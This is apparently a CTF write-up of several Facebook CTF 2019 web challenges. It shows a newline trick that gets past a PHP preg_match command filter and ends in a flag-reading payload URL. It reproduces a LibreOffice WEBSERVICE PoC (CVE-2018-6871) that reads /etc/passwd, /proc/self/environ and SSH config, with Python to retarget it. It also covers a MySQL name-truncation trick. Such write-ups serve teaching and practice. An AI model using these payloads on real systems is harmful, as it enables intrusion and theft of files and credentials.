facebookCTF2019
rceservice - bypassing preg_match
http://challenges.fbctf.com:8085
We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'
(This problem does not require any brute force or scanning.
We will ban your team if we detect brute force or scanning).
Web Administration Interface
Enter command as JSON:
I did not solve this one during the competition, so this is a reproduction based on a writeup. The service takes a command as JSON, but it evidently filters a lot.
輸入:
{"cmd":"ls"}
Attempting to run command:
index.php
Almost anything else returns Hacking attempt detected. The filter rule turns out to be:
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
}
So the challenge boils down to bypassing preg_match.
A common way to get past a preg_match check of this shape is multi-line input. The pattern is compiled without the s and m modifiers, so . never matches a newline and $ only matches at the very end of the string (or just before one final trailing newline). For ^.*(...).*$ to succeed, the token matched by the group and the trailing .*$ must sit on a single line that runs to the end of the string.
例如:
{
"cmd": "ls /home/rceservice"
}
Because nothing rejects newlines in the input, we can send exactly this to the server and get the command output instead of the warning. What breaks the regex is the newline between the "cmd" value and the closing brace: whatever the group matches (and [\x00-\x1F]+ happily matches the first newline itself), the trailing .*$ cannot cross that second newline to reach the end of the string. A single newline right after the opening { would not be enough on its own.
Note that the newlines have to be URL-encoded when submitting: {%0a"cmd":"ls /home/rceservice"%0a}. When it came to reading the flag there was no cat command; the writeup explains that the application overrides its PATH:
putenv('PATH=/home/rceservice/jail');
Get the flag:
http://challenges.fbctf.com:8085/?cmd={%0a%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0a}
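The filter and the bypass, modelled in Python as an added example (this is not the challenge's PHP and not code from the writeup): the regex is transcribed from the preg_match call above, the rest of the handler (decode the JSON, hand "cmd" to the shell) is assumed from the page's description, and Python's re module follows the same rules as PCRE for . and $ when no modifiers are set.

```python
import json
import re
from urllib.parse import unquote

# The challenge's PCRE filter, transcribed from the PHP above. Python's re
# agrees with PCRE on the two things that matter here: without the s flag
# '.' does not match "\n", and without the m flag '$' only matches at the
# very end of the string (or just before one final trailing "\n").
FILTER = re.compile(
    r"^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|"
    r"continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|"
    r"getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|"
    r"pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|"
    r"times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|"
    r"[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$"
)


def is_blocked(payload: str) -> bool:
    """True when the PHP check would print 'Hacking attempt detected'."""
    return FILTER.search(payload) is not None


def run_command(payload: str):
    """Model of the handler (assumed structure; the page only shows the filter
    branch): refuse filtered input, otherwise return the "cmd" value that
    would be passed to the shell, or None when the filter fires."""
    if is_blocked(payload):
        return None
    # json_decode, like json.loads, accepts newlines between tokens,
    # which is what makes the multi-line trick work at all.
    return json.loads(payload)["cmd"]


def decode_query(cmd_param: str) -> str:
    """Undo the %0a/%22/%20 encoding used in the ?cmd= query string."""
    return unquote(cmd_param)


# The query string from the getflag URL above.
FLAG_QUERY = "{%0a%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0a}"

if __name__ == "__main__":
    cases = [
        '{"cmd":"ls"}',                                  # allowed: lowercase, quotes, braces, colon only
        '{"cmd":"ls /home/rceservice"}',                 # blocked: '/' is inside the character class
        '{\n"cmd": "ls /home/rceservice"\n}',           # allowed: newline between the value and '}'
        '{\n"cmd": "/bin/cat /home/rceservice/flag"}',  # blocked: a leading newline alone is not enough
        decode_query(FLAG_QUERY),                        # allowed: the page's final payload
    ]
    for c in cases:
        print(repr(c), "->", "blocked" if is_blocked(c) else run_command(c))
```

Running it shows the two cases side by side: a payload with only a leading newline is still caught, because [\x00-\x1F]+ matches that newline itself and everything after it is one line ending at the end of the string, whereas the newline before the closing brace leaves nothing for .*$ to reach. The backtrack-limit behaviour discussed next is specific to PHP's PCRE settings and is not modelled here.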
It turned out that the multi-line JSON trick was not the Facebook team's intended solution. The intended one abused PCRE's backtracking and recursion limits: when preg_match hits pcre.backtrack_limit or pcre.recursion_limit it returns false instead of 0 or 1, the elseif treats false like "no match", and a sufficiently large input slips through the filter. preg_last_error() is the only thing that would reveal the difference.
secret note keeper
Find the secret note that contains the fl4g!
http://challenges.fbctf.com:8082
Same thing but in tokyo: http://challenges3.fbctf.com:8082/
(Timeout is 5 seconds for links, flag is case insensitive)
This one uses CVE-2018-6871:
https://www.exploit-db.com/exploits/44022
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure
https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure
Download poc.fods from that repository. The relevant rows of the sheet are shown below. Inside the file the quotes in table:formula are XML-escaped as &quot; and & as &amp;, as they must be inside an attribute value; a cell editor shows them decoded.
<table:table-row table:style-name="ro2">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Current user:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce1" table:formula="of:=&quot;/home/&quot; &amp; MID(COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;); FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;)) + LEN(&quot;USER=&quot;); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;); FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;)))-FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;))-LEN(&quot;USER=&quot;)) &amp; &quot;/&quot;" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=FIND(&quot;:&quot;; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
<text:p>689</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=FIND(&quot;/home&quot;; [.F3]; FIND(&quot;:x:1000:1000:&quot;; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
<text:p>676</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;/etc/passwd&quot;)" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell/>
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
<text:p>http://localhost:8080</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro3">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>List of private keys:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce1"/>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] &amp; &quot;/.ssh/config&quot;); &quot;~&quot;; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Send:</text:p>
</table:table-cell>
<table:table-cell/>
Change /etc/passwd in the WEBSERVICE call to /home/libreoffice_admin/flag, upload the file, and the flag comes back:
fb{wh0_7h0u6h7_l1br30ff1c3_c4n_b3_u53ful}
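As an added example (not part of the original page and not jollheef's PoC), here is how to retarget the WEBSERVICE cell programmatically while keeping the document well-formed. The row below is a constructed stand-in for the relevant row of poc.fods, written the way the file actually stores it; the rest of the .fods skeleton is assumed to stay as downloaded, and the namespace URIs are the standard OpenDocument ones. The point is that the formula's quotes must be stored as &quot; inside the attribute, so pasting the decoded text shown above straight back into the file would break the XML.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Standard OpenDocument namespace URIs used by the fragment.
TABLE_NS = "urn:oasis:names:tc:opendocument:xmlns:table:1.0"
OFFICE_NS = "urn:oasis:names:tc:opendocument:xmlns:office:1.0"
TEXT_NS = "urn:oasis:names:tc:opendocument:xmlns:text:1.0"

# Constructed stand-in for the WEBSERVICE row of poc.fods, as stored on disk:
# the formula's double quotes are &quot; inside the attribute value.
SAMPLE_ROW = f"""<table:table-row xmlns:table="{TABLE_NS}" xmlns:office="{OFFICE_NS}" xmlns:text="{TEXT_NS}">
  <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;/etc/passwd&quot;)" office:value-type="string" office:string-value="">
    <text:p>#VALUE!</text:p>
  </table:table-cell>
</table:table-row>
"""


def webservice_formula(path: str) -> str:
    """OpenFormula text that reads `path` through WEBSERVICE (the decoded form a
    cell editor shows). A literal double quote inside an OpenFormula string
    literal is written as two double quotes."""
    return 'of:=COM.MICROSOFT.WEBSERVICE("%s")' % path.replace('"', '""')


def formula_attr(formula: str) -> str:
    """Escape a formula for use inside a double-quoted XML attribute."""
    return escape(formula, {'"': "&quot;"})


def retarget(fods_xml: str, old_path: str, new_path: str) -> str:
    """Point every WEBSERVICE(old_path) cell at new_path by editing the raw
    file text, so styles, namespaces and the other cells are left untouched."""
    old_attr = formula_attr(webservice_formula(old_path))
    if old_attr not in fods_xml:
        raise ValueError(f"no WEBSERVICE cell reads {old_path!r}")
    return fods_xml.replace(old_attr, formula_attr(webservice_formula(new_path)))


def formulas(fods_xml: str) -> list:
    """Parse the (edited) XML and return the decoded table:formula values; this
    both checks well-formedness and shows exactly what Calc will evaluate."""
    root = ET.fromstring(fods_xml)
    tag = f"{{{TABLE_NS}}}table-cell"
    attr = f"{{{TABLE_NS}}}formula"
    return [cell.get(attr) for cell in root.iter(tag) if cell.get(attr)]


if __name__ == "__main__":
    patched = retarget(SAMPLE_ROW, "/etc/passwd", "/home/libreoffice_admin/flag")
    print(formulas(patched))
```

Run the same retarget() over the downloaded poc.fods to produce the upload; formulas() on the result is a cheap sanity check that the edit did not leave a stray unescaped quote behind before the file goes to the converter.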
products manager
I used facebook + ' '*56 + hack as the name, not_so_secret as the secret and hacked!!! as the description, and the product was inserted successfully. I could then view the product using the name facebook and the secret not_so_secret and get the flag. The reason is that the database silently truncates the inserted name to the column's 64-character limit (MySQL does this when strict mode is off), which drops the trailing hack that made the name differ from facebook on the way in, and its default string comparison ignores trailing spaces (PAD SPACE collations), so the stored value, facebook followed by 56 spaces, compares equal to facebook afterwards.
easter egg
Searching all pages for fb{ found nothing. But searching for { turned up something interesting on the careers page:
<p>Facebook's Application Security team<span style="color:white">{</span>is seeking a passionate hacker to help us secure over 2 billion users....
And searching for }:
<p>The Oculus Security Engineering team designs, builds, and supports the infrastructure and services<span style="color:white">}</span>that allow Oculus to move fast,...
Also found <span style="color:white">f</span>, <span style="color:white">b</span> and so on: the flag is spread over the page one character per white-on-white span, so collecting the spans in document order recovers it.
import re

# careers: the saved HTML of the careers page
with open("careers", "r") as f:
    text = f.read()

# each flag character sits in its own white-on-white span; collect them in page order
chars = re.findall(r'<span style="color:white">(.)</span>', text)
print(''.join(chars))
fb{we're_hiring}
events
Python template injection
https://ramadistra.dev/fbctf-2019-events
secret note keeper
PostgreSQL injection (asynchronous injection)
https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md